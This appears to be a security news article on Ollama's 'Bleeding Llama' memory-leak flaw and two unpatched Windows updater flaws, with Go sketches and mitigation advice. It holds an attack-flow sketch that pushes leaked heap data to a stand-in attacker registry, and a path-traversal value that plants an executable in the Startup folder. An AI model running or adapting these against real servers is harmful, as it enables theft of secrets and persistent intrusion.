
Ollama Under Siege: Critical ‘Bleeding Llama’ Flaw Exposes AI Secrets, Windows Users Face Persistent Threat


A chilling revelation from cybersecurity researchers has sent ripples through the AI community: a severe vulnerability in Ollama, the popular open-source framework for running large language models (LLMs) locally, could allow attackers to remotely pilfer the server’s entire process memory. Dubbed “Bleeding Llama” by Cyera, this out-of-bounds read flaw (CVE-2026-7482, CVSS score: 9.1) is estimated to jeopardize over 300,000 servers worldwide. As if that weren’t enough, separate, unpatched vulnerabilities in Ollama’s Windows update mechanism threaten persistent code execution, painting a grim picture for users.

Unpacking ‘Bleeding Llama’: A Memory Leakage Nightmare

Ollama, a darling of developers with over 171,000 GitHub stars, empowers users to run sophisticated LLMs without relying on cloud infrastructure. However, this convenience comes at a perilous cost. The “Bleeding Llama” vulnerability stems from a heap out-of-bounds read within the GGUF model loader and affects Ollama versions prior to 0.17.1. GGUF (GPT-Generated Unified Format) is the de facto standard file format for packaging LLM weights and metadata for local inference.

The core of the problem lies in how Ollama handles GGUF files. When an attacker supplies a specially crafted GGUF file to the /api/create endpoint, they can declare tensor offsets and sizes that exceed the file’s actual length. During the quantization process, particularly in the WriteTo() function (found in fs/ggml/gguf.go and server/quantization.go), the server attempts to read beyond its allocated heap buffer. This critical oversight is exacerbated by Ollama’s use of the unsafe package, bypassing crucial memory safety guarantees.
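
To make the failure mode concrete, here is a minimal Go sketch of the anti-pattern, not Ollama’s actual code: the struct and field names are invented for illustration, but the shape of the bug, trusting an attacker-declared length and materializing it with the unsafe package, matches the reported flaw.

```go
package main

import (
	"fmt"
	"unsafe"
)

// tensorHeader mimics metadata parsed from an untrusted GGUF file.
// The struct and field names are invented for illustration; Ollama's
// real loader (fs/ggml/gguf.go) is considerably more involved.
type tensorHeader struct {
	declaredLen uint64 // attacker-controlled: may exceed the real payload
}

func main() {
	payload := []byte("weights")           // only 7 bytes are actually backed by the file
	hdr := tensorHeader{declaredLen: 4096} // the header lies about the tensor size

	// The unsafe anti-pattern: build a slice of the *declared* length over
	// the *actual* buffer. unsafe.Slice bypasses Go's bounds guarantees, so
	// reading the tail of this slice walks past the allocation into adjacent
	// heap memory (env vars, API keys, other users' prompts).
	leaky := unsafe.Slice(&payload[0], hdr.declaredLen)

	// The fix is a bounds check before any unsafe construction:
	//   if hdr.declaredLen > uint64(len(payload)) { /* reject the file */ }

	// Undefined behavior: may print neighboring heap bytes or crash.
	fmt.Printf("bytes beyond the real buffer: %x\n", leaky[len(payload):len(payload)+16])
}
```

Because the declared length is never checked against the bytes actually present in the file, the oversized slice becomes a window into whatever the allocator placed nearby.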

The Dire Consequences: Your AI’s Inner Workings Exposed

A successful exploitation of CVE-2026-7482 is not merely theoretical; it’s a direct pipeline to an organization’s most sensitive AI-related data. Attackers can trigger the out-of-bounds read by setting a tensor’s shape to an arbitrarily large number, leading to the leakage of:

  • Environment variables
  • API keys
  • System prompts
  • Concurrent users’ conversation data

This treasure trove of information can then be exfiltrated by uploading the compromised model artifact via the /api/push endpoint to an attacker-controlled registry. The attack chain is alarmingly straightforward (a schematic code sketch follows the steps below):

  1. Upload: A malicious GGUF file with an inflated tensor shape is sent to a network-accessible Ollama server via an HTTP POST request.
  2. Activate: The /api/create endpoint is used to initiate model creation, triggering the out-of-bounds read.
  3. Exfiltrate: The /api/push endpoint is leveraged to siphon off the leaked heap memory data to an external server.
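
For defenders modeling this traffic, the following Go sketch approximates the reported flow. The /api/create and /api/push endpoints are as described by Cyera; the host, model names, and request bodies are simplified placeholders, and the crafted GGUF itself is deliberately omitted.

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
)

// target is an assumed network-exposed Ollama server; 11434 is the default port.
const target = "http://victim.example:11434"

// post is a small helper for JSON POSTs; error handling trimmed for brevity.
func post(path, body string) {
	resp, err := http.Post(target+path, "application/json", bytes.NewBufferString(body))
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
	fmt.Println(path, "->", resp.Status)
}

func main() {
	// Step 1 (upload) is omitted deliberately: it would involve a GGUF file
	// whose tensor metadata declares sizes far beyond the file's real length.

	// Step 2 (activate): model creation triggers quantization and, with it,
	// the out-of-bounds read that copies adjacent heap memory into the
	// resulting artifact. The body here is simplified and hypothetical.
	post("/api/create", `{"model": "exfil-model"}`)

	// Step 3 (exfiltrate): pushing the poisoned artifact to a registry the
	// attacker controls ships the leaked heap bytes off the server.
	post("/api/push", `{"model": "attacker-registry.example/exfil-model"}`)
}
```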

Dor Attias, a security researcher at Cyera, starkly warns, “An attacker can learn basically anything about the organization from your AI inference — API keys, proprietary code, customer contracts, and much more.” He adds, “Engineers often connect Ollama to tools like Claude Code. In those cases, the impact is even higher — all tool outputs flow to the Ollama server, get saved in the heap, and potentially end up in an attacker’s hands.”

Immediate Action Required: Fortifying Your Ollama Instances

Given the severity, users are urged to take immediate protective measures:

  • Apply Latest Fixes: Update Ollama to version 0.17.1 or newer without delay.
  • Limit Network Access: Restrict external access to Ollama servers.
  • Audit and Isolate: Scrutinize running instances for internet exposure and secure them behind robust firewalls.
  • Implement Authentication: Deploy an authentication proxy or API gateway, as Ollama’s REST API lacks built-in authentication.
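
On that last point, a thin reverse proxy is one lightweight way to bolt authentication onto Ollama. The sketch below uses only Go’s standard library; the token, listen address, and upstream URL are placeholders to adapt.

```go
package main

import (
	"crypto/subtle"
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
)

const authToken = "change-me" // placeholder: load from a secret store in practice

func main() {
	// Ollama's default local listener; adjust if yours differs.
	upstream, err := url.Parse("http://127.0.0.1:11434")
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(upstream)

	handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got := r.Header.Get("Authorization")
		want := "Bearer " + authToken
		// Constant-time compare to avoid timing side channels.
		if subtle.ConstantTimeCompare([]byte(got), []byte(want)) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		proxy.ServeHTTP(w, r)
	})

	// Expose only this authenticated listener; keep 11434 firewalled off.
	log.Fatal(http.ListenAndServe(":8080", handler))
}
```

In production you would load the token from a secrets store and terminate TLS in front of (or inside) this listener.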

Windows Users Beware: Unpatched Flaws Pave Way for Persistent Code Execution

Adding to Ollama’s security woes, researchers at Striga have unveiled two high-severity, still unpatched vulnerabilities within the Windows update mechanism. Disclosed to the maintainers on January 27, 2026, and made public after a 90-day disclosure period, these flaws can be chained together to achieve persistent code execution.

Bartłomiej “Bartek” Dmitruk, co-founder of Striga, explains that the Windows desktop client automatically starts on login, listens locally on 127.0.0.1:11434, and periodically checks for updates via the /api/update endpoint. The identified vulnerabilities exploit this update routine:

  • CVE-2026-42248 (CVSS score: 7.7): Missing Signature Verification. Unlike its macOS counterpart, the Windows updater fails to verify the digital signature of the update binary before installation.
  • CVE-2026-42249 (CVSS score: 7.7): Path Traversal. The Windows updater constructs the local path for the installer’s staging directory directly from HTTP response headers without proper sanitization.

An attacker who can control an update server reachable by a victim’s Ollama client can chain these flaws to supply an arbitrary executable as part of the update process. The payload is written to the Windows Startup folder and executed on every login, all without triggering a signature-check warning. One potential attack vector involves overriding the OLLAMA_UPDATE_URL environment variable to point to a malicious server.
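
To illustrate why the path-traversal half of the chain is so dangerous, here is a hedged Go sketch of the anti-pattern and a defensive rewrite. The header value, staging directory, and function names are invented for illustration; the updater’s actual internals were not published in this form.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

const stagingDir = `C:\Users\victim\AppData\Local\OllamaUpdate` // hypothetical

// unsafeStagePath mirrors the anti-pattern: the file name comes straight
// from an attacker-controlled HTTP response header.
func unsafeStagePath(headerValue string) string {
	return filepath.Join(stagingDir, headerValue)
}

// safeStagePath strips any directory components and rejects traversal,
// pinning the write inside the staging directory.
func safeStagePath(headerValue string) (string, error) {
	name := filepath.Base(filepath.Clean(headerValue))
	if name == "." || name == ".." || strings.ContainsAny(name, `/\`) {
		return "", fmt.Errorf("invalid update file name %q", headerValue)
	}
	return filepath.Join(stagingDir, name), nil
}

func main() {
	// A malicious server sets the header to climb out of the staging dir
	// and drop its payload into the Startup folder instead. (The traversal
	// resolves on Windows, where '\' is the path separator.)
	evil := `..\..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe`

	fmt.Println("unsafe:", unsafeStagePath(evil)) // escapes stagingDir
	if _, err := safeStagePath(evil); err != nil {
		fmt.Println("safe:  ", err) // rejected
	}
}
```

The missing-signature flaw compounds this: even a correctly placed installer should be rejected unless its digital signature verifies against a pinned publisher identity, as the macOS client reportedly enforces.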

Protecting Against Persistent Threats

While these Windows flaws remain unpatched, users should exercise extreme caution. Until official patches are released, consider:

  • Monitoring Network Traffic: Keep an eye on update requests from Ollama clients.
  • Restricting Update Sources: If possible, configure firewalls or network policies to only allow updates from trusted Ollama servers.
  • Manual Updates: Consider disabling automatic updates and performing manual updates only after verifying their integrity (see the checksum sketch below).
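
“Verifying integrity” can be as simple as comparing the downloaded installer’s SHA-256 digest against a checksum obtained out-of-band, for example from the project’s release page over HTTPS. A minimal Go sketch, with the file name and expected digest as placeholders:

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"os"
)

func main() {
	// Placeholders: the downloaded installer and a checksum obtained
	// out-of-band from a channel you trust.
	const installer = "OllamaSetup.exe"
	const expected = "<published sha-256 hex digest>"

	data, err := os.ReadFile(installer)
	if err != nil {
		panic(err)
	}
	sum := sha256.Sum256(data)
	if hex.EncodeToString(sum[:]) != expected {
		fmt.Println("digest mismatch: do not run this installer")
		os.Exit(1)
	}
	fmt.Println("digest matches the published checksum")
}
```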

The recent disclosures underscore a critical need for vigilance in the rapidly evolving AI landscape. As LLMs become integral to operations, securing the frameworks that run them is paramount to preventing catastrophic data breaches and maintaining trust in AI technologies.

